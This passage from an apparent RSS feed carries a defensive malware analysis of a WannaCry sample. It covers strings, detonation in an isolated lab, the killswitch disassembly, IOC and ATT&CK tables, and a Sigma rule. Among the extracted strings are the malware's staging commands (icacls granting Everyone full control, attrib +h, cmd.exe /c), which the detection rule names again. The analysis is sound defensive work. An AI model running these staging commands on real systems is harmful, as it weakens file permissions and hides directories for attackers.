&lt;p&gt;&lt;strong&gt;Runtime string construction defeats static matching.&lt;/strong&gt; The first C2 domain existed nowhere in the binary. Any pipeline that only diffs extracted strings against a blocklist would have reported this file as clean on that dimension.&lt;/p&gt;




&lt;p&gt;&lt;em&gt;Written by Vasilis Mantas, Senior Threat Detection Engineer. Analysis performed in an isolated lab using FlareVM, REMnux, FLOSS, PEStudio, Wireshark, Procmon and Cutter.&lt;/em&gt;&lt;/p&gt;

</description>
      <category>malware</category>
      <category>analysis</category>
      <category>cybersecurity</category>
      <category>reversing</category>
    </item>
    <item>
      <title>WannaCry, Reopened</title>
      <dc:creator>Vasilis Mantas</dc:creator>
      <pubDate>Mon, 31 Aug 2026 13:08:37 +0000</pubDate>
      <link>https://dev.to/vasilis_mantas/wannacry-reopened-b8e</link>
      <guid>https://dev.to/vasilis_mantas/wannacry-reopened-b8e</guid>
      <description>&lt;h2&gt;
  
  
  What a modern triage of a 2017 ransomware sample teaches about killswitch logic and staging behaviour
&lt;/h2&gt;

&lt;p&gt;&lt;strong&gt;Vasilis Mantas&lt;/strong&gt; — Threat Detection Engineer&lt;/p&gt;




&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Verdict:&lt;/strong&gt; WannaCry checks a hardcoded URL before doing anything destructive. If the URL &lt;em&gt;responds&lt;/em&gt;, the sample exits without encrypting. If it cannot be reached, encryption proceeds. This inverted logic is the single most instructive thing in the binary, and it is easy to get backwards — including in a lab, where a network simulator that answers every request will silently prevent the malware from detonating at all.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;WannaCry has been analysed exhaustively since May 2017. This walkthrough is not an attempt to say something new about the campaign. It is a demonstration of triage method on a sample whose ground truth is already known, which makes it a useful benchmark: every conclusion below can be checked against the public record.&lt;/p&gt;

&lt;p&gt;The analysis was performed in an isolated lab with no route to the internet.&lt;/p&gt;




&lt;h2&gt;
  
  
  Surface behaviour
&lt;/h2&gt;

&lt;p&gt;Detonating the sample produces the outcome the sample is famous for. Files across the system are renamed with a &lt;code&gt;.WNCRY&lt;/code&gt; extension, a ransom interface titled &lt;em&gt;Wana Decrypt0r 2.0&lt;/em&gt; appears demanding $600 in Bitcoin, and the desktop wallpaper is replaced with a plaintext version of the same message.&lt;/p&gt;

&lt;p&gt;A practical note for anyone running this in a lab: several FlareVM analysis tools become unusable after detonation, because their own files are encrypted along with everything else. Snapshot before, not after.&lt;/p&gt;




&lt;h2&gt;
  
  
  Basic static analysis
&lt;/h2&gt;

&lt;p&gt;Extracting strings with FLOSS, filtering short noise:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;FLOSS.exe &lt;span class="nt"&gt;-n&lt;/span&gt; 7 Ransomware.wannacry.exe.malz &lt;span class="o"&gt;&amp;gt;&lt;/span&gt; outputstrings.txt
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The DOS header string &lt;code&gt;!This program cannot be run in DOS mode.&lt;/code&gt; appears multiple times. A PE header appearing more than once inside a single file means embedded executables, and each occurrence is followed by a distinct set of DLL imports — a different API surface per embedded binary. PEStudio confirmed three packed binaries in total.&lt;/p&gt;

&lt;p&gt;The remaining strings are unusually generous:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;cmd.exe /c "%s"
115p7UMMngoj1pMvkpHijcRdfJNXj6LrLn
12t9YDPgwueZ9NyMgw519p7AA8isjr6SMw
13AM4VW2dhxYgXeQepoHkHSQuy6NgaEb94
Global\MsWinZonesCacheCounterMutexA
tasksche.exe
TaskStart
icacls . /grant Everyone:F /T /C /Q
attrib +h .
C:\%s\qeriuwjhrf
C:\%s\%s
http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Three Bitcoin wallets, a named mutex, a dropped executable name, two format-string paths, and one conspicuously random-looking domain. The &lt;code&gt;icacls&lt;/code&gt; and &lt;code&gt;attrib&lt;/code&gt; commands grant everyone full control over a directory tree and hide it — staging behaviour, visible before a single instruction is executed.&lt;/p&gt;

&lt;p&gt;The import table reinforces the picture. &lt;code&gt;CryptGenRandom&lt;/code&gt; and &lt;code&gt;CryptAcquireContextA&lt;/code&gt; for key generation. A dense block of &lt;code&gt;ws2_32.dll&lt;/code&gt; socket functions — &lt;code&gt;socket&lt;/code&gt;, &lt;code&gt;connect&lt;/code&gt;, &lt;code&gt;send&lt;/code&gt;, &lt;code&gt;recv&lt;/code&gt;, &lt;code&gt;WSAStartup&lt;/code&gt; — alongside &lt;code&gt;GetAdaptersInfo&lt;/code&gt;, indicating network enumeration and self-propagation. &lt;code&gt;InternetOpenA&lt;/code&gt; and &lt;code&gt;InternetOpenUrlA&lt;/code&gt; from &lt;code&gt;wininet.dll&lt;/code&gt;, which turn out to matter more than anything else in the list.&lt;/p&gt;




&lt;h2&gt;
  
  
  Dynamic analysis, and a lab trap
&lt;/h2&gt;

&lt;p&gt;The second detonation was run with REMnux providing inetsim as a fake DNS resolver and HTTP responder. The sample did nothing. No encryption, no ransom note, no filesystem activity of consequence.&lt;/p&gt;

&lt;p&gt;That is not a broken sample. It is the killswitch working.&lt;/p&gt;

&lt;p&gt;When inetsim answers the request to &lt;code&gt;iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com&lt;/code&gt; with a 200 OK, WannaCry concludes the domain is live and exits. In the first detonation, with no simulator running, the request failed, the sample concluded the domain was unregistered, and it encrypted the filesystem.&lt;/p&gt;

&lt;p&gt;The consequence for analysts is worth stating directly. A generic network simulator that returns success for every request will suppress this sample's entire payload. An analyst who only ever detonates with full simulation would conclude the binary is inert.&lt;/p&gt;

&lt;p&gt;With the payload allowed to run, TCPView showed the propagation attempt: a large volume of TCP SYN packets to sequential and apparently random addresses on &lt;strong&gt;port 445&lt;/strong&gt;, the SMB service port — the sample scanning for further hosts to infect. A second listener appeared, &lt;code&gt;taskhsvc.exe&lt;/code&gt; bound to &lt;code&gt;127.0.0.1:9050&lt;/code&gt;, the Tor SOCKS port, providing the anonymised channel back to the operators.&lt;/p&gt;

&lt;p&gt;Procmon, filtered on the sample's process name and &lt;code&gt;CreateFile&lt;/code&gt;, showed the drop:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Ransomware.wan... → C:\Windows\tasksche.exe   SUCCESS
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;followed in the process tree by &lt;code&gt;tasksche.exe&lt;/code&gt; executing with the argument &lt;code&gt;/i&lt;/code&gt;. Filtering again on the new PID revealed the staging directory:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;C:\ProgramData\dveqybpwqzws072\
    msg\                      TaskData\
    @Please_Read_Me@.txt      @WanaDecryptor@.exe
    00000000.eky              00000000.pky        00000000.res
    b.wnry  c.wnry  f.wnry  r.wnry  s.wnry  t.wnry  u.wnry
    taskdl.exe                taskse.exe
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The &lt;code&gt;C:\%s\%s&lt;/code&gt; format string from the strings output is now explained: the directory name is generated at runtime, which is why the folder is &lt;code&gt;dveqybpwqzws072&lt;/code&gt; here and something else elsewhere. A service is created bearing the same random name — the persistence mechanism.&lt;/p&gt;




&lt;h2&gt;
  
  
  Advanced static analysis
&lt;/h2&gt;

&lt;p&gt;Loading the binary into Cutter and navigating to &lt;code&gt;main&lt;/code&gt; puts the killswitch logic on screen in a dozen instructions:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;0x0040814a   mov  esi, str.http:__www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com
0x0040817b   call dword [InternetOpenA]
0x00408194   call dword [InternetOpenUrlA]
0x0040819a   mov  edi, eax
0x004081a3   test edi, edi
0x004081a5   jne  0x4081bc
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The decompiler view is clearer still:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight c"&gt;&lt;code&gt;&lt;span class="n"&gt;eax&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;InternetOpenUrlA&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;esi&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;ecx&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mh"&gt;0x84000000&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;span class="n"&gt;edi&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;eax&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="n"&gt;esi&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;InternetCloseHandle&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;edi&lt;/span&gt; &lt;span class="o"&gt;==&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;esi&lt;/span&gt;&lt;span class="p"&gt;)();&lt;/span&gt;
    &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;esi&lt;/span&gt;&lt;span class="p"&gt;)(&lt;/span&gt;&lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="n"&gt;eax&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;fcn_00408090&lt;/span&gt;&lt;span class="p"&gt;();&lt;/span&gt;
    &lt;span class="n"&gt;eax&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="n"&gt;eax&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;code&gt;InternetOpenUrlA&lt;/code&gt; returns a handle, or NULL on failure. The handle lands in &lt;code&gt;edi&lt;/code&gt;, and &lt;code&gt;test edi, edi&lt;/code&gt; sets the zero flag only when the call failed.&lt;/p&gt;

&lt;p&gt;The branch is therefore: &lt;strong&gt;handle is NULL — the domain did not resolve — call &lt;code&gt;fcn_00408090&lt;/code&gt;, the encryption routine.&lt;/strong&gt; Handle is valid — the domain responded — close the handles, clean up the stack, return.&lt;/p&gt;

&lt;p&gt;The graph view makes the asymmetry obvious. One path is labelled normal execution and leads into the encryption function. The other is a short exit stub. The condition separating them is a single &lt;code&gt;test&lt;/code&gt; on the result of a web request.&lt;/p&gt;

&lt;p&gt;Registering that domain is what stopped the campaign in 2017. The disassembly above is the mechanism, in six instructions.&lt;/p&gt;




&lt;h2&gt;
  
  
  Indicators of compromise
&lt;/h2&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Type&lt;/th&gt;
&lt;th&gt;Indicator&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Killswitch domain&lt;/td&gt;
&lt;td&gt;&lt;code&gt;iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Mutex&lt;/td&gt;
&lt;td&gt;&lt;code&gt;Global\MsWinZonesCacheCounterMutexA&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Dropped file&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;C:\Windows\tasksche.exe&lt;/code&gt; (executed with &lt;code&gt;/i&lt;/code&gt;)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Staging path&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;C:\ProgramData\&amp;lt;random&amp;gt;\&lt;/code&gt; containing &lt;code&gt;.wnry&lt;/code&gt; files&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Dropped tools&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;taskdl.exe&lt;/code&gt;, &lt;code&gt;taskse.exe&lt;/code&gt;, &lt;code&gt;@WanaDecryptor@.exe&lt;/code&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Ransom note&lt;/td&gt;
&lt;td&gt;&lt;code&gt;@Please_Read_Me@.txt&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Extension&lt;/td&gt;
&lt;td&gt;&lt;code&gt;.WNCRY&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Network&lt;/td&gt;
&lt;td&gt;Mass outbound SYN to TCP/445&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Network&lt;/td&gt;
&lt;td&gt;Local listener on &lt;code&gt;127.0.0.1:9050&lt;/code&gt; (Tor)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;BTC&lt;/td&gt;
&lt;td&gt;&lt;code&gt;115p7UMMngoj1pMvkpHijcRdfJNXj6LrLn&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;BTC&lt;/td&gt;
&lt;td&gt;&lt;code&gt;12t9YDPgwueZ9NyMgw519p7AA8isjr6SMw&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;BTC&lt;/td&gt;
&lt;td&gt;&lt;code&gt;13AM4VW2dhxYgXeQepoHkHSQuy6NgaEb94&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;




&lt;h2&gt;
  
  
  MITRE ATT&amp;amp;CK mapping
&lt;/h2&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Tactic&lt;/th&gt;
&lt;th&gt;Technique&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Execution&lt;/td&gt;
&lt;td&gt;T1106 — Native API&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Persistence&lt;/td&gt;
&lt;td&gt;T1543.003 — Create or Modify System Process: Windows Service&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Defense Evasion&lt;/td&gt;
&lt;td&gt;T1564.001 — Hide Artifacts: Hidden Files and Directories&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Defense Evasion&lt;/td&gt;
&lt;td&gt;T1222.001 — File and Directory Permissions Modification&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Discovery&lt;/td&gt;
&lt;td&gt;T1046 — Network Service Discovery&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Lateral Movement&lt;/td&gt;
&lt;td&gt;T1210 — Exploitation of Remote Services&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Command and Control&lt;/td&gt;
&lt;td&gt;T1090.003 — Proxy: Multi-hop Proxy (Tor)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Impact&lt;/td&gt;
&lt;td&gt;T1486 — Data Encrypted for Impact&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Impact&lt;/td&gt;
&lt;td&gt;T1490 — Inhibit System Recovery&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;




&lt;h2&gt;
  
  
  Detection guidance
&lt;/h2&gt;

&lt;p&gt;The hashes and the killswitch domain have limited value now. The behavioural sequence does not.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;1. Permission-widening plus attribute-hiding on a freshly created directory.&lt;/strong&gt; The &lt;code&gt;icacls . /grant Everyone:F /T /C /Q&lt;/code&gt; and &lt;code&gt;attrib +h .&lt;/code&gt; pair is staging behaviour that predates encryption. Catching it means catching the sample before impact, which is the only detection that actually matters for ransomware.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="na"&gt;title&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;Mass Permission Grant Followed by Directory Hiding&lt;/span&gt;
&lt;span class="na"&gt;status&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;experimental&lt;/span&gt;
&lt;span class="na"&gt;logsource&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;category&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;process_creation&lt;/span&gt;
  &lt;span class="na"&gt;product&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;windows&lt;/span&gt;
&lt;span class="na"&gt;detection&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;icacls&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="na"&gt;Image|endswith&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s1"&gt;'&lt;/span&gt;&lt;span class="s"&gt;\icacls.exe'&lt;/span&gt;
    &lt;span class="na"&gt;CommandLine|contains|all&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="s1"&gt;'&lt;/span&gt;&lt;span class="s"&gt;/grant'&lt;/span&gt;
      &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="s1"&gt;'&lt;/span&gt;&lt;span class="s"&gt;Everyone:F'&lt;/span&gt;
      &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="s1"&gt;'&lt;/span&gt;&lt;span class="s"&gt;/T'&lt;/span&gt;
  &lt;span class="na"&gt;attrib&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="na"&gt;Image|endswith&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s1"&gt;'&lt;/span&gt;&lt;span class="s"&gt;\attrib.exe'&lt;/span&gt;
    &lt;span class="na"&gt;CommandLine|contains&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s1"&gt;'&lt;/span&gt;&lt;span class="s"&gt;+h'&lt;/span&gt;
  &lt;span class="na"&gt;condition&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;icacls or attrib&lt;/span&gt;
&lt;span class="na"&gt;falsepositives&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="s"&gt;Some software installers and backup agents&lt;/span&gt;
&lt;span class="na"&gt;level&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;high&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Correlate the two within a short window on one host rather than alerting on either alone — that is what separates a real staging sequence from routine installer noise.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;2. Executable written to &lt;code&gt;C:\Windows\&lt;/code&gt; by a non-system process, then executed.&lt;/strong&gt; A user-context process dropping a binary directly into the Windows directory and launching it is a narrow, high-value pattern.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;3. Outbound SMB scanning from a workstation.&lt;/strong&gt; A single host opening connections to TCP/445 across many destinations in a short window is almost never legitimate on an endpoint. Threshold on distinct destination count per source per minute.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;4. Local Tor SOCKS listener.&lt;/strong&gt; A process binding &lt;code&gt;127.0.0.1:9050&lt;/code&gt; is worth an alert in any enterprise that has not deliberately deployed Tor.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;5. Suspicious process spawning &lt;code&gt;cmd.exe /c&lt;/code&gt;.&lt;/strong&gt; Present here, and generic enough to earn its place in any ruleset — with the tuning that implies.&lt;/p&gt;




&lt;h2&gt;
  
  
  Analyst takeaways
&lt;/h2&gt;

&lt;p&gt;&lt;strong&gt;Environment shapes behaviour, so vary the environment.&lt;/strong&gt; The single most important finding in this analysis only appeared because the sample was detonated both with and without network simulation. One configuration produced a functioning ransomware; the other produced an inert file. Detonating once tells you what a sample does under one set of conditions, not what it does.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Strings foreshadow structure.&lt;/strong&gt; &lt;code&gt;icacls&lt;/code&gt;, &lt;code&gt;attrib&lt;/code&gt;, &lt;code&gt;C:\%s\%s&lt;/code&gt; and &lt;code&gt;tasksche.exe&lt;/code&gt; were all visible before execution, and each was confirmed by dynamic analysis. Reading strings carefully turns dynamic analysis into confirmation rather than exploration.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;The decisive logic is often tiny.&lt;/strong&gt; The behaviour that defined a global incident reduces to one API call, one &lt;code&gt;test&lt;/code&gt;, and one conditional jump. Finding that block took longer than understanding it — which is usually how reverse engineering goes.&lt;/p&gt;




&lt;p&gt;&lt;em&gt;Written by Vasilis Mantas, Senior Threat Detection Engineer. Analysis performed in an isolated lab using FlareVM, REMnux, FLOSS, PEStudio, PEview, Wireshark, Procmon, TCPView and Cutter.&lt;/em&gt;&lt;/p&gt;

</description>
      <category>malware</category>
      <category>reverse</category>
      <category>cybersecurity</category>
      <category>analysis</category>
    </item>
  </channel>
</rss>
